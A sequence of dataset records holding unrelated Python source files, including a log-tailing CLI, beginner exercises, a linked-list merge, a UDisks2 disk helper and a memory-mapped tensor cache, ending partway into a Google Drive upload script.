cache_file, delimiter=None):\n        \"\"\"Save position of the file to cache\n\n        First the file record is written to a temporary file, then records of other files are\n        appended and finally the temporary file is copied to the original cache path\n        As a result records of the last read file are stored at the start of the cache so they are\n        found faster on the next run\n\n        Parameters\n        ----------\n        cache_file : |str|\n            The path of the cache file\n        delimiter : |str|, optional\n            The delimiter used by cache records\n\n        Raises\n        ------\n        `CutthelogCacheError`\n            On failed cache reading or malformed cache record for the file\n        \"\"\"\n        file_prefix, delimiter = self._get_cache_props(delimiter)\n        offset, last_line = self.get_position()\n        try:\n            with tempfile.NamedTemporaryFile(mode='wb') as fhandler:\n                fhandler.write(self.path.encode())\n                fhandler.write(delimiter)\n                fhandler.write(str(offset).encode())\n                fhandler.write(delimiter)\n                fhandler.write(last_line)\n                if not last_line.endswith(EOL):\n                    fhandler.write(EOL)\n                try:\n                    with open(cache_file, 'rb') as source_fhandler:\n                        for line in source_fhandler:\n                            if not line.startswith(file_prefix):\n                                fhandler.write(line)\n                except EnvironmentError:\n                    pass\n                fhandler.flush()\n                shutil.copyfile(fhandler.name, cache_file)\n        except EnvironmentError as err:\n            msg = 'Failed to save cache: ' + str(err)\n            raise CutthelogCacheError(msg)\n\n\ndef argument_parsing():\n    parser = argparse.ArgumentParser(description=__doc__)\n    main_group = parser.add_mutually_exclusive_group(required=True)\n    main_group.add_argument('logfile', help=HELPS['logfile'], nargs='?')\n    main_group.add_argument('-V', '--version', help=HELPS['version'], action='store_true')\n    parser.add_argument('-c', '--cache-file', help=HELPS['cache_file'])\n    parser.add_argument('--cache-delimiter', help=HELPS['cache_delimiter'],\n                        default=CACHE_DELIMITER)\n    parser.add_argument('-v', '--verbose', help=HELPS['verbose'], action='store_true')\n    args = parser.parse_args()\n    if args.cache_file is None:\n        home = os.getenv('USERPROFILE' if os.name == 'nt' else 'HOME', '/')\n        home_cache = os.path.join(home, CACHE_FILENAME)\n        args.cache_file = home_cache if os.access(home, os.R_OK | os.W_OK) else CACHE_FILENAME\n    return args\n\n\ndef check_logfile(path):\n    if not os.path.isfile(path):\n        logging.error(NOT_FOUND, path)\n        return 66\n    if not os.access(path, os.R_OK):\n        logging.error(NO_PERMISSION, 'read', path)\n        return 77\n    return 0\n\n\ndef check_cache_file(path):\n    if os.path.isfile(path):\n        if not os.access(path, os.R_OK | os.W_OK):\n            logging.error(NO_PERMISSION, 'read/write', path)\n            return 77\n    else:\n        cache_dir = os.path.dirname(path)\n        if not os.path.isdir(cache_dir):\n            logging.error(NOT_FOUND, cache_dir)\n            return 74\n        if not os.access(cache_dir, os.R_OK | os.W_OK):\n            logging.error(NO_PERMISSION, 'read/write', cache_dir)\n            return 77\n        try:\n            with open(path, 'wb'):\n                pass\n        except EnvironmentError as err:\n            logging.error('Failed to create file: %s', err)\n            return 74\n    return 0\n\n\ndef main():\n    \"\"\"The cutthelog command line utility\n\n    It exercises the basic functionality of the `CutTheLog` object. 
See description in README.rst\n    \"\"\"\n    args = argument_parsing()\n    if args.version:\n        print(__version__)\n        return 0\n    lvl = logging.DEBUG if args.verbose else logging.WARNING\n    logging.basicConfig(stream=sys.stderr, level=lvl, format=LOG_FORMAT)\n    returncode = check_logfile(args.logfile) or check_cache_file(args.cache_file)\n    if returncode:\n        return returncode\n    cutthelog = CutTheLog(args.logfile)\n    try:\n        cutthelog.set_position_from_cache(args.cache_file, delimiter=args.cache_delimiter)\n    except CutthelogCacheError as err:\n        logging.error(err)\n        return 74\n    initial_position = cutthelog.get_position()\n    try:\n        with cutthelog as line_iter:\n            stdout = sys.stdout.buffer if hasattr(sys.stdout, 'buffer') else sys.stdout\n            stdout.writelines(line_iter)\n    except EnvironmentError as err:\n        logging.error('Failed to read file: %s', err)\n        return 74\n    if cutthelog.get_position() != initial_position:\n        try:\n            cutthelog.save_to_cache(args.cache_file, delimiter=args.cache_delimiter)\n        except CutthelogCacheError as err:\n            logging.error(err)\n            return 74\n    return 0\n\n\nif __name__ == '__main__':\n    sys.exit(main())\n","repo_name":"yaznahar/cutthelog","sub_path":"cutthelog.py","file_name":"cutthelog.py","file_ext":"py","file_size_in_byte":12141,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"}
{"seq_id":"34424640521","text":"\r\n#range(...)# serial numbers\r\nx=[\"apple\",\"banana\",\"orange\",\"cherry\"]\r\ny=[88,90,95]\r\nz=range(1,50)\r\nfor j in x:\r\n    if(j==\"cherry\"):\r\n        print(y[2])\r\n\r\nx=[66,75,21,35,45,12,15,63,58,74]\r\nno=3\r\nfor j in x:\r\n    print(j,no)\r\n    no+=2\r\n\r\nsum=0\r\ni=1\r\nwhile i <=3: #1.2.3\r\n    sum += i \r\n    i +=1\r\nprint(\"sum:\",sum,\"i:\",i)\r\n#print(\"sum:\", sum)\r\n\r\nsum=0\r\nfor i in range(3): \r\n    sum += i\r\nprint(\"sum:\",sum, \"i:\", i)\r\n \r\n\r\n\r\n\r\n \r\n","repo_name":"Anne0407/python-for-while","sub_path":"my04.py","file_name":"my04.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
{"seq_id":"6867096844","text":"class Node:\n\n    def __init__(self, value):\n        self.data = value\n        self.next = None\n\n\ndef insert_at_end(head, value):\n    curr = head\n    while(curr.next):\n        curr = curr.next\n\n    curr.next = Node(value)\n\n\ndef merge_lists_recursive(headA, headB):\n    newList = None\n\n    if(headA is None):\n        return headB\n\n    if(headB is None):\n        return headA\n\n    if(headA.data < headB.data):\n        newList = headA\n        newList.next = merge_lists_recursive(headA.next, headB)\n    else:\n        newList = headB\n        newList.next = merge_lists_recursive(headA, headB.next)\n\n    return newList\n\n\ndef merge_lists_iterative(headA, headB):\n    newList = Node(0)\n    newHead = newList\n\n    while(headA or headB):\n        if(headA is None):\n            newList.next = headB\n            break\n\n        if(headB is None):\n            newList.next = headA\n            break\n\n        if(headA.data < headB.data):\n            newList.next = headA\n            headA = headA.next\n        else:\n            newList.next = headB\n            headB = headB.next\n        newList = newList.next\n\n    return newHead.next\n\n\ndef print_list(message, head):\n    if (head is None):\n        return\n\n    print(message, end=\"\")\n    temp = head\n    while(temp):\n        print(temp.data, \"->\", end=\" \")\n        temp = temp.next\n    print(\"None\")\n\n\nif __name__ == \"__main__\":\n    headA = Node(1)\n    insert_at_end(headA, 3)\n    insert_at_end(headA, 5)\n    insert_at_end(headA, 7)\n    insert_at_end(headA, 9)\n\n    print_list(\"List1: \", headA)\n\n    headB = Node(2)\n    insert_at_end(headB, 4)\n    insert_at_end(headB, 6)\n    insert_at_end(headB, 
8)\n\n    print_list(\"List2: \", headB)\n\n    print_list(\"Iter Merged List: \", merge_lists_iterative(headA, headB))\n    # print_list(\"Recr Merged List: \", merge_lists_recursive(headA, headB))\n","repo_name":"mani319/DSA","sub_path":"linked_lists/merge_two_sorted_lists.py","file_name":"merge_two_sorted_lists.py","file_ext":"py","file_size_in_byte":1822,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
{"seq_id":"36177554729","text":"import torch\n\n# Check if a GPU is available; if not, use CPU\ndevice = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n# Create tensors on the GPU\na = torch.randn(3, 3).to(device)\nb = torch.randn(3, 3).to(device)\n\n# Perform a simple calculation on the GPU\nresult = a + b\n\n# Move the result back to the CPU if needed (for printing, etc.)\nresult_cpu = result.to(\"cpu\")\n\n# Print the result\nprint(\"Result on GPU:\")\nprint(result)\nprint(\"\\nResult on CPU:\")\nprint(result_cpu)\n","repo_name":"Quitzchell/chatbot-sandbox","sub_path":"gpu_scripts/gpu_amd.py","file_name":"gpu_amd.py","file_ext":"py","file_size_in_byte":482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
{"seq_id":"10857311106","text":"#! -*- coding:utf-8 -*-\n\nimport jieba\nimport jieba.posseg as psg\nimport jieba.analyse\nimport codecs\nimport json\nfrom tqdm import tqdm\nimport os\n\ntest_path = '../data/coreEntityEmotion_test_stage1.txt'\ndata_path = '../runs/all_train_data.json'\ncut_train_path = '../runs/all_train_cut.json'\ncut_test_path = '../runs/all_test_cut.json'\ntran_dic_path = '../runs/train_dic.json'\ntest_dic_path = '../runs/test_dic.json'\n\n\ndef jieba_config():\n    files = os.listdir('../dic')\n    for file_name in files:\n        jieba.load_userdict('../dic/'+file_name)\n    jieba.load_userdict('../runs/entity.txt')\n    jieba.analyse.set_stop_words('../data/stop_words.txt')\n\ndef load_train_data(data_path):\n    with open(data_path, 'r', encoding='utf-8') as load_f:\n        data = json.load(load_f)\n    return data\n\ndef stop_words():\n    stop_words = []\n    with open('../data/stop_words.txt', 'r', encoding='utf-8') as f:\n        lines = f.readlines()\n        for line in lines:\n            line = line.strip('\\n')\n            stop_words.append(line)\n    return stop_words\n\ndef cut_train(data_path):\n    final_train_data = []\n    # word_flag_dic = {}\n    train_data = load_train_data(data_path)\n    sw = stop_words()\n    i = 0\n    for x in train_data:\n        if len(x.items()) == 4:\n            try:\n                title = x['title']\n                content = x['content']\n\n                # title_words = jieba.cut(title)\n                # content_words = jieba.cut(content)\n\n                # title_filter = [word for word in title_words if word not in stop_words()]\n                # content_filter = [word for word in content_words if word not in stop_words()]\n\n                title_filter = filter(lambda p: p.word not in sw and len(p.word.strip()) > 0, psg.cut(title))\n                content_filter = filter(lambda p: p.word not in sw and len(p.word.strip()) > 0, psg.cut(content))\n\n                # word_flag_dic = dict((word,flag) for (word,flag) in [title_filter,content_filter])\n                # for word, flag in title_filter:\n                #     word_flag_dic[word] = flag\n                # for word, flag in content_filter:\n                #     word_flag_dic[word] = flag\n\n                # temp = {}\n                # temp['newsId'] = x['newsId']\n                # temp['title'] = title_filter\n                # temp['content'] = content_filter\n                # entitys = [c[0] for c in x['coreEntityEmotions']]\n                # temp['entities'] = entitys\n                # final_train_data.append(temp)\n\n                if i % 500 == 0:\n                    print(i,' data finish')\n                i+=1\n            except KeyError:\n                print(x)\n                pass\n    # with codecs.open(cut_train_path, 'w', 
encoding='utf-8') as f:\n    #     json.dump(final_train_data, f, indent=4, ensure_ascii=False)\n    # with codecs.open(tran_dic_path, 'w', encoding='utf-8') as f:\n    #     json.dump(word_flag_dic, f, indent=4, ensure_ascii=False)\n    return final_train_data\n\ndef load_test():\n    test_chars = {}\n    test_data = []\n    min_count = 2\n\n    with open(test_path, encoding='utf-8') as f:\n        for l in tqdm(f):\n            a = json.loads(l.strip())\n            test_data.append(\n                {\n                    'newsId': a['newsId'],\n                    'title': a['title'],\n                    'content': a['content'],\n                }\n            )\n            for c in a['content']:\n                test_chars[c] = test_chars.get(c, 0) + 1\n            for c in a['title']:\n                test_chars[c] = test_chars.get(c, 0) + 1\n\n    with codecs.open('../runs/test_chars.json', 'w', encoding='utf-8') as f:\n        chars = {i: j for i, j in test_chars.items() if j >= min_count}\n        id2char = {i + 2: j for i, j in enumerate(chars)}  # padding: 0, unk: 1\n        char2id = {j: i for i, j in id2char.items()}\n        json.dump([id2char, char2id], f, indent=4, ensure_ascii=False)\n    return test_data\n\ndef cut_test():\n    # word_flag_dic = {}\n    final_test_data = []\n    test_data = load_test()\n    sw = stop_words()\n    i = 0\n    for x in test_data:\n        if len(x.items()) == 3:\n            try:\n                title = x['title']\n                content = x['content']\n\n                title_words = jieba.cut(title)\n                content_words = jieba.cut(content)\n\n                # title_filter = [word for word in title_words if word not in stop_words()]\n                # content_filter = [word for word in content_words if word not in stop_words()]\n\n                title_filter = filter(lambda p: p.word not in sw and len(p.word.strip()) > 0, psg.cut(title))\n                content_filter = filter(lambda p: p.word not in sw and len(p.word.strip()) > 0, psg.cut(content))\n\n                # for word, flag in title_filter:\n                #     word_flag_dic[word] = flag\n                # for word, flag in content_filter:\n                #     word_flag_dic[word] = flag\n\n                # temp = {}\n                # temp['newsId'] = x['newsId']\n                # temp['title'] = title_filter\n                # temp['content'] = content_filter\n                # final_test_data.append(temp)\n                if i%500 == 0:\n                    print(i,' data finish')\n                i+=1\n            except KeyError:\n                print(x)\n                pass\n    # with codecs.open(cut_test_path, 'w', encoding='utf-8') as f:\n    #     json.dump(final_test_data, f, indent=4, ensure_ascii=False)\n    # with codecs.open(test_dic_path, 'w', encoding='utf-8') as f:\n    #     json.dump(final_test_data, f, indent=4, ensure_ascii=False)\n    return final_test_data\n\nif __name__ == '__main__':\n    cut_train(data_path)\n    cut_test()\n","repo_name":"angelOnly/2019_content_recognition","sub_path":"src/cut_data.py","file_name":"cut_data.py","file_ext":"py","file_size_in_byte":5637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
{"seq_id":"31517474220","text":"from fastapi import FastAPI\r\n\r\napp = FastAPI()\r\n\r\n\r\n@app.get(\"/groups\")\r\nasync def groups():\r\n    groups_list = [\r\n        {\r\n            \"id\": 1,\r\n            \"online\": False,\r\n            \"nombre\": \"Casa\",\r\n            \"color\": \"1\",\r\n            \"miembros\": [\"Adrian\", \"Brais\", \"Bea\", \"Camilo\"],\r\n        },\r\n        {\r\n            \"id\": 2,\r\n            \"online\": True,\r\n            \"nombre\": \"Trabajo\",\r\n            \"color\": \"3\",\r\n            \"miembros\": [\"Mario#1231\", \"Brais#1223\", \"Miguel#4123\"],\r\n        },\r\n    ]\r\n    return groups_list\r\n","repo_name":"braiso-22/CozyCave-back","sub_path":"app/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
{"seq_id":"9390515902","text":"#! 
/usr/bin/env python3\n\n# Udisks2 API reference: https://udisks.freedesktop.org/docs/latest/\n# Example code: https://www.apt-browse.org/browse/ubuntu/trusty/main/i386/usb-creator-common/0.2.56/file/usr/share/usb-creator/usb-creator-helper\n\nimport gi\n# Make sure the right UDisks version is loaded\ngi.require_version('UDisks', '2.0')\nfrom gi.repository import UDisks, GLib\nfrom os.path import exists, join, basename\nimport os\nimport time\nfrom utils import getoutput, shell_exec, has_grub\nfrom encryption import get_status, is_encrypted, unmount_partition\n\n\n# Subclass dict class to overwrite the __missing__() method\n# to implement autovivificious dictionaries:\n# https://en.wikipedia.org/wiki/Autovivification#Python\nclass Tree(dict):\n def __missing__(self, key):\n value = self[key] = type(self)()\n return value\n\n\nclass Udisks2():\n def __init__(self):\n super(Udisks2, self).__init__()\n self.no_options = GLib.Variant('a{sv}', {})\n self.no_interaction = GLib.Variant('a{sv}', {'auth.no_user_interaction': GLib.Variant('b', True)})\n self.devices = Tree()\n\n # Create multi-dimensional dictionary with drive/device/deviceinfo\n def fill_devices(self, flash_only=True):\n\n self.devices.clear()\n\n client = UDisks.Client.new_sync(None)\n manager = client.get_object_manager()\n objects = manager.get_objects()\n\n for obj in objects:\n block = None\n partition = None\n fs = None\n drive = None\n device_path = ''\n fs_type = ''\n drive_path = ''\n add_device = False\n removable = False\n connectionbus = ''\n mount_point = ''\n total_size = 0\n free_size = 0\n used_size = 0\n \n block = obj.get_block()\n if block is None:\n continue\n\n device_path = block.get_cached_property('Device').get_bytestring().decode('utf-8')\n fs_type = block.get_cached_property('IdType').get_string()\n if fs_type == '':\n continue\n\n mapper_path = ''\n luks_mount = ''\n if 'luks' in fs_type.lower():\n mapper_path, luks_mount = self.get_luks_info(device_path)\n if mapper_path:\n device_path = mapper_path\n fs_type = self.get_filesystem(device_path)\n else:\n # Block object doesn't refresh correctly after decrypting\n # block.call_rescan_sync doesn't do anything\n # Fix with workaround:\n fs_type = self.get_filesystem(device_path)\n\n drive_path = self.get_drive_from_device_path(device_path)\n\n if device_path != drive_path:\n total_size = (block.get_cached_property('Size').get_uint64() / 1024)\n if (mapper_path and total_size == 0) or \\\n (not mapper_path and not exists(drive_path)) or \\\n (not mapper_path and total_size == 0 and not 'luks' in fs_type.lower()):\n continue\n\n if luks_mount:\n mount_point = luks_mount\n total_size, free_size, used_size = self.get_mount_size(mount_point)\n else:\n fs = obj.get_filesystem()\n if fs is not None:\n unmount = False\n mount_points = fs.get_cached_property('MountPoints').get_bytestring_array()\n if mount_points:\n mount_point = mount_points[0]\n else:\n # It can be manually mounted (with mount command)\n mount_point = self.get_mount_point(device_path)\n if not mount_point:\n # If not mounted, temporally mount it to get needed info\n mount_point = self._mount_filesystem(fs)\n unmount = True\n if exists(mount_point):\n total_size, free_size, used_size = self.get_mount_size(mount_point)\n if unmount:\n self._unmount_filesystem(fs)\n mount_point = ''\n\n # There are no partitions: set free size to total size\n partition = obj.get_partition()\n if partition is None:\n free_size = total_size\n\n drive_name = block.get_cached_property('Drive').get_string()\n drive_obj = 
manager.get_object(drive_name)\n if drive_obj is None:\n continue\n drive = drive_obj.get_drive()\n removable = drive.get_cached_property(\"Removable\").get_boolean()\n connectionbus = drive.get_cached_property(\"ConnectionBus\").get_string()\n\n if flash_only:\n # Check for usb mounted flash drives\n if connectionbus == 'usb' and removable:\n add_device = True\n else:\n add_device = True\n\n if add_device:\n uuid = self.get_uuid(device_path)\n label = self.get_label(device_path)\n grub = has_grub(device_path)\n debug_title = \"Device Info of: %s\" % device_path\n print(('========== %s ==========' % debug_title))\n print(('UUID: %s' % uuid))\n print(('FS Type: %s' % fs_type))\n print(('Mount point: %s' % mount_point))\n print(('Label: %s' % label))\n print(('Total size: %s' % total_size))\n print(('Free size: %s' % free_size))\n print(('Used size: %s' % used_size))\n print(('ConnectionBus: %s' % connectionbus))\n print(('Removable: %s' % str(removable)))\n print(('Has Grub: %s' % str(grub)))\n print((('=' * 22) + ('=' * len(debug_title))))\n\n # Partition information\n self.devices[device_path]['uuid'] = uuid\n self.devices[device_path]['fs_type'] = fs_type\n self.devices[device_path]['mount_point'] = mount_point\n self.devices[device_path]['label'] = label\n self.devices[device_path]['total_size'] = total_size\n self.devices[device_path]['free_size'] = free_size\n self.devices[device_path]['used_size'] = used_size\n self.devices[device_path]['connectionbus'] = connectionbus\n self.devices[device_path]['removable'] = removable\n self.devices[device_path]['has_grub'] = grub\n\n def _get_object_path(self, device_path):\n return \"/org/freedesktop/UDisks2/block_devices/%s\" % basename(device_path)\n\n def _get_block(self, device_path):\n obj_path = self._get_object_path(device_path)\n client = UDisks.Client.new_sync(None)\n dev = client.get_object(obj_path)\n return dev.get_block()\n\n def _get_filesystem(self, device_path):\n obj_path = self._get_object_path(device_path)\n client = UDisks.Client.new_sync(None)\n dev = client.get_object(obj_path)\n return dev.get_filesystem()\n\n def _get_partition(self, device_path):\n obj_path = self._get_object_path(device_path)\n client = UDisks.Client.new_sync(None)\n dev = client.get_object(obj_path)\n return dev.get_partition()\n\n def _get_drive(self, device_path):\n obj_path = self._get_object_path(device_path)\n client = UDisks.Client.new_sync(None)\n manager = client.get_object_manager()\n dev = client.get_object(obj_path)\n block = dev.get_block()\n if block is not None:\n drive_name = block.get_cached_property('Drive').get_string()\n drive_obj = manager.get_object(drive_name)\n if drive_obj is not None:\n return drive_obj.get_drive()\n return None\n\n def _unmount_filesystem(self, fs):\n try:\n return fs.call_unmount_sync(self.no_options, None)\n except:\n raise\n\n # Adapted from udisk's test harness.\n # This is why the entire backend needs to be its own thread.\n def _mount_filesystem(self, fs):\n mount_points = []\n if fs is not None:\n '''Try to mount until it does not fail with \"Busy\".'''\n timeout = 10\n while timeout >= 0:\n try:\n return fs.call_mount_sync(self.no_options, None)\n except GLib.GError as e:\n if 'UDisks2.Error.AlreadyMounted' in e.message:\n break\n elif not 'UDisks2.Error.DeviceBusy' in e.message:\n raise\n print('Busy.')\n time.sleep(0.3)\n timeout -= 1\n if timeout >= 0:\n mount_points = fs.get_cached_property('MountPoints').get_bytestring_array()\n else:\n raise\n if mount_points:\n return mount_points[0]\n else:\n 
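# no mount point could be obtained; callers such as mount_device()\n            # treat an empty string as a failed mount\n            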
return ''\n\n def get_drives(self):\n drives = []\n for d in self.devices:\n drive_path = self.get_drive_from_device_path(d)\n if exists(drive_path) and drive_path not in drives:\n drives.append(drive_path)\n return drives\n\n def get_drive_device_paths(self, drive=None):\n devices = []\n for d in self.devices:\n drive_path = None\n if drive is not None:\n drive_path = self.get_drive_from_device_path(d)\n if drive_path == drive:\n if exists(d) and d not in devices:\n devices.append(d)\n return devices\n\n def mount_device(self, device_path):\n fs = self._get_filesystem(device_path)\n if fs is not None:\n mount = self._mount_filesystem(fs)\n if mount != '':\n # Set mount point and free space for this device\n total, free, used = self.get_mount_size(mount)\n self.devices[device_path]['mount_point'] = mount\n self.devices[device_path]['free_size'] = free\n return mount\n return ''\n\n def unmount_device(self, device_path):\n if is_encrypted(device_path):\n unmount_partition(device_path)\n else:\n fs = self._get_filesystem(device_path)\n if fs is not None:\n return self._unmount_filesystem(fs)\n else:\n shell_exec(\"umount --force {}\".format(device_path))\n\n def unmount_drive(self, drive_path):\n for device_path in self.get_drive_device_paths(drive_path):\n self.unmount_device(device_path)\n\n def poweroff_drive(self, drive_path):\n try:\n for device_path in self.get_drive_device_paths(drive_path):\n drive = self._get_drive(device_path)\n if drive is not None:\n return drive.call_power_off_sync(self.no_options, None)\n except:\n raise\n\n def set_filesystem_label(self, fs, label):\n try:\n return fs.set_label_sync(label, self.no_options, None)\n except:\n raise\n\n def set_filesystem_label_by_device(self, device_path, label):\n fs = self._get_filesystem(device_path)\n if fs is not None:\n return self.set_filesystem_label(fs, label)\n return False\n\n def set_partition_bootable(self, partition):\n try:\n return partition.SetFlags(7, self.no_options)\n except:\n raise\n\n def set_partition_bootable_by_device_path(self, device_path):\n partition = self._get_partition(device_path)\n return self.set_partition_bootable(partition)\n\n def set_partition_label(self, partition, label):\n try:\n return partition.SetName(label, self.no_options)\n except:\n raise\n\n def set_partition_label_by_device_path(self, device_path, label):\n partition = self._get_partition(device_path)\n return self.set_partition_label(partition, label)\n\n # =================================================================\n # Useful non-udisks2 functions\n # =================================================================\n\n def get_drive_from_device_path(self, device_path):\n if '/dev/mapper' in device_path:\n if exists(device_path):\n status = get_status(device_path)\n device_path = status['device']\n else:\n device_path = device_path.replace('/mapper', '')\n return device_path.rstrip('0123456789')\n\n # returns total/free/used tuple (Kb)\n def get_mount_size(self, mount_point):\n try:\n st = os.statvfs(mount_point)\n except:\n return (0, 0, 0)\n total = (st.f_blocks * st.f_frsize) / 1024\n free = (st.f_bavail * st.f_frsize) / 1024\n used = ((st.f_blocks - st.f_bfree) * st.f_frsize) / 1024\n return (total, free, used)\n\n def get_uuid(self, partition_path):\n return getoutput(\"blkid -o value -s UUID {}\".format(partition_path))[0]\n\n def get_mount_point(self, partition_path):\n return getoutput(\"lsblk -o MOUNTPOINT -n %s | grep -v '^$'\" % partition_path)[0]\n\n def get_filesystem(self, partition_path):\n return 
getoutput(\"blkid -o value -s TYPE %s\" % partition_path)[0]\n\n def get_device_from_uuid(self, uuid):\n uuid = uuid.replace('UUID=', '')\n return getoutput(\"blkid -U {}\".format(uuid))[0]\n\n def get_label(self, partition_path):\n return getoutput(\"sudo blkid -o value -s LABEL %s\" % partition_path)[0]\n\n def get_luks_info(self, partition_path):\n mapper_path = ''\n mount_point = ''\n mapper = '/dev/mapper'\n mapper_name = getoutput(\"ls %s | grep %s$\" % (mapper, basename(partition_path)))[0]\n if not mapper_name:\n uuid = self.get_uuid(partition_path)\n if uuid:\n mapper_name = getoutput(\"ls %s | grep %s$\" % (mapper, uuid))[0]\n if mapper_name:\n mapper_path = join(mapper, mapper_name)\n if mapper_path:\n mount_point = self.get_mount_point(mapper_path)\n return (mapper_path, mount_point)\n","repo_name":"aalsabi/solydxk-system","sub_path":"usr/lib/solydxk/system/udisks2.py","file_name":"udisks2.py","file_ext":"py","file_size_in_byte":14626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"40555231311","text":"import gc\nimport mmap\nimport os\nfrom tempfile import mkstemp\n\nimport torch\n\n\nclass TensorCache:\n \"\"\"\n Temporary file containing a list of read-only tensors.\n\n The list can't be modified after reading from it.\n \"\"\"\n\n def __init__(self, dir=None):\n self.fd, name = mkstemp(dir=dir)\n # Automatically delete when the file descriptor is closed\n os.unlink(os.path.join(dir, name))\n\n self.map = None\n self.tensors = [] # (start, end, dtype, size)\n self.START, self.END, self.DTYPE, self.SIZE = 0, 1, 2, 3\n\n def append(self, tensor):\n assert self.map is None, \"Can't append tensors after reading from file\"\n\n start = self.tensors[-1][self.END] if len(self.tensors) > 0 else 0\n end = start + tensor.element_size() * tensor.numel()\n dtype, size = tensor.dtype, tensor.size()\n\n b = bytes(tensor.detach().cpu().contiguous().numpy())\n assert len(b) == end - start, (len(b), tensor.element_size(), tensor.numel())\n\n os.lseek(self.fd, start, os.SEEK_SET)\n os.write(self.fd, b)\n self.tensors.append((start, end, dtype, size))\n\n def cat_to_last(self, tensor):\n assert self.map is None, \"Can't concatenate to last tensor after reading from file\"\n assert len(self.tensors) > 0, \"No tensor to concatenate to\"\n\n last = self.tensors[-1]\n assert last[self.DTYPE] == tensor.dtype, (\n \"Must have same type\",\n last[self.DTYPE],\n tensor.dtype,\n )\n assert len(last[self.SIZE]) == len(tensor.size()), (\n \"Must have same number of dimensions\",\n last[self.SIZE],\n tensor.size(),\n )\n for dim in range(1, len(last[self.SIZE])):\n assert last[self.SIZE][dim] == tensor.size(dim), (\n \"Must have same shape in dimensions after first\",\n last[self.SIZE],\n tensor.size(),\n )\n cat_size = (last[self.SIZE][0] + tensor.size(0), *last[self.SIZE][1:])\n\n self.append(tensor)\n cat_end = self.tensors[-1][self.END] # Appended tensor end\n self.tensors.pop() # Un-append tensor\n self.tensors[-1] = (\n self.tensors[-1][self.START],\n cat_end,\n self.tensors[-1][self.DTYPE],\n cat_size,\n )\n\n def _map(self):\n if self.map is None:\n os.lseek(self.fd, 0, os.SEEK_SET)\n os.fsync(self.fd)\n self.map = mmap.mmap(self.fd, self.tensors[-1][self.END], access=mmap.ACCESS_READ)\n\n def __len__(self):\n return len(self.tensors)\n\n def __getitem__(self, i_tensor):\n \"\"\"Returns read-only tensor with appended data.\"\"\"\n\n self._map()\n info = self.tensors[i_tensor]\n tensor = torch.frombuffer(\n self.map[info[self.START] : 
info[self.END]], dtype=info[self.DTYPE]\n ).view(info[self.SIZE])\n return tensor\n\n def __iter__(self):\n # OPTIM\n for i in range(len(self.tensors)):\n yield self[i]\n\n def close(self):\n if self.map is not None:\n self.map.close()\n self.map = None\n\n os.close(self.fd)\n self.fd = None\n\n\nif __name__ == \"__main__\":\n print(torch.cuda.memory_allocated() / 1e6, \"x\")\n x = torch.ones(int(1e7), dtype=torch.float32, device=\"cuda\")\n\n print(torch.cuda.memory_allocated() / 1e6, \"c\")\n c = TensorCache(dir=\"./tmp\")\n\n print(torch.cuda.memory_allocated() / 1e6, \"append\")\n c.append(x)\n\n print(torch.cuda.memory_allocated() / 1e6, \"x = None\")\n x = None\n\n print(torch.cuda.memory_allocated() / 1e6, \"collect\")\n\n print(torch.cuda.memory_allocated() / 1e6, \"empty\")\n torch.cuda.empty_cache()\n\n print(torch.cuda.memory_allocated() / 1e6, \"x\")\n x = c[0].cuda()\n\n print(torch.cuda.memory_allocated() / 1e6, \"close\")\n c.close()\n\n print(torch.cuda.memory_allocated() / 1e6, \"c = None\")\n c = None\n\n print(torch.cuda.memory_allocated() / 1e6, \"collect\")\n\n print(torch.cuda.memory_allocated() / 1e6, \"exit\")\n","repo_name":"litvand/nic","sub_path":"cache.py","file_name":"cache.py","file_ext":"py","file_size_in_byte":4071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"38375545830","text":"T = int(input())\na = input().split()\nfor i in range(len(a)):\n a[i] = int(a[i])\nb = a.copy()\nb.sort()\n# print(a)\n# print(b)\nif(a == b):\n print('Yes')\nelse:\n print('No')\n","repo_name":"Md-Nur/Data-Structure-Algorithm","sub_path":"Toph.co/15_decentArrays.py","file_name":"15_decentArrays.py","file_ext":"py","file_size_in_byte":177,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"3281138710","text":"#!/usr/bin/env python\nimport logging\nfrom operator import itemgetter\nimport os\nimport re\nimport sys\nimport tempfile\n\nfrom apiclient.discovery import build\nfrom apiclient.http import MediaFileUpload\nfrom httplib2 import Http\nfrom oauth2client.client import AccessTokenCredentials\nimport requests\nfrom robobrowser import RoboBrowser\n\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.DEBUG)\nconsole_handler = logging.StreamHandler()\nconsole_handler.setLevel(logging.INFO)\nlogger.addHandler(console_handler)\n\n\nclass DriveFolder(object):\n def __init__(self, folder_name):\n self.folder_name = folder_name\n\n self.logger = logger.getChild('DriveFolder')\n\n self.service = self._get_drive_service(self._get_access_token())\n\n self.folder = self.ensure_folder()\n self.log(\n logging.INFO, '__init__',\n 'Saving to folder ID {0}'.format(self.folder['id']))\n\n def log(self, level, method_name, message, *args, **kwargs):\n child_logger = self.logger.getChild(method_name)\n child_logger.log(level, message, *args, **kwargs)\n\n def upload_files(self, local_filenames):\n for file_name in local_filenames:\n self.log(\n logging.INFO, 'upload_files', 'Saving {0}'.format(file_name))\n\n self.remove_file_if_exists(file_name, 'application/pdf')\n remote_file = self.upload_file(file_name, 'application/pdf')\n self.move_to_parent(remote_file)\n\n self.log(\n logging.INFO, 'upload_files',\n 'Done with {0}'.format(file_name))\n\n def list_items(self):\n # Use the cached version of this list if available.\n if hasattr(self, '_items'):\n self.log(logging.INFO, 'list_items', 'Using cached list of items')\n return self._items\n\n # Get a list of all 
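        # [Aside, not from the original source: the loop below is the stock
        # google-api-python-client pagination idiom -- list_next() builds the
        # request for the next page from the previous request and response,
        # and returns None once every page has been consumed. A minimal
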